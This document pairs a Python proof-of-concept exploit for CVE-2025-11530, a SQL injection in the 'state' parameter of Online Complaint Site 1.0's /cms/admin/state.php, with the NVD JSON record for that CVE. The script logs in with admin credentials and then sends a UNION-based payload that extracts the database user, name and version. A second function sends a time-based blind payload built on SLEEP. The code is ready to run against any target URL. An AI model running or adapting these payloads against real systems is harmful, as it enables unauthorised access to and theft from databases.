CVE-2025-11530

# CVE-2025-11530 PoC - SQL Injection in Online Complaint Site 1.0 # Vulnerable file: /cms/admin/state.php # Vulnerable parameter: state import requests # Target configuration TARGET_URL = "http://target.com" LOGIN_URL = f"{TARGET_URL}/cms/admin/" VULN_URL = f"{TARGET_URL}/cms/admin/state.php" # Attacker credentials (low-privilege admin account required) USERNAME = "admin" PASSWORD = "password123" def exploit_sqli(): """Exploit SQL injection via 'state' parameter using UNION-based technique""" # Create a session to maintain cookies session = requests.Session() # Step 1: Login to obtain authenticated session login_data = { "username": USERNAME, "password": PASSWORD, "submit": "Login" } session.post(LOGIN_URL, data=login_data) # Step 2: Inject malicious SQL payload into 'state' parameter # Payload aims to extract database version and current user sql_payload = "1' UNION SELECT 1,user(),database(),version(),5,6,7-- -" # Step 3: Send the crafted request to the vulnerable endpoint params = {"state": sql_payload} response = session.get(VULN_URL, params=params) # Step 4: Parse and display extracted information if response.status_code == 200: print(f"[+] Exploit successful!") print(f"[+] Response length: {len(response.text)}") # Extract sensitive data from response (customize parsing as needed) if "root@localhost" in response.text or "admin" in response.text: print(f"[+] Database information leaked in response") return response.text else: print(f"[-] Exploit failed, status code: {response.status_code}") return None def time_based_blind_sqli(): """Alternative: Time-based blind SQL injection for data exfiltration""" session = requests.Session() login_data = {"username": USERNAME, "password": PASSWORD, "submit": "Login"} session.post(LOGIN_URL, data=login_data) # Time-based payload using SLEEP to confirm injection payload = "1' AND SLEEP(5)-- -" params = {"state": payload} response = session.get(VULN_URL, params=params, timeout=10) elapsed = response.elapsed.total_seconds() if elapsed >= 5: print(f"[+] Time-based SQLi confirmed (response delayed {elapsed}s)") else: print(f"[-] No injection detected") if __name__ == "__main__": print("[*] CVE-2025-11530 Exploit - SQL Injection in state.php") print("[*] Running UNION-based exploit...") exploit_sqli() print("\n[*] Running time-based blind SQLi test...") time_based_blind_sqli()

{"cve": {"id": "CVE-2025-11530", "sourceIdentifier": "[email protected]", "published": "2025-10-09T04:16:29.563", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Online Complaint Site 1.0. Affected is an unknown function of the file /cms/admin/state.php. This manipulation of the argument state causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_complaint_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "52A830BB-2DB8-4016-804F-98E6537BA087"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xmqaq/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327668", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327668", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.670208", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/xmqaq/cve/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}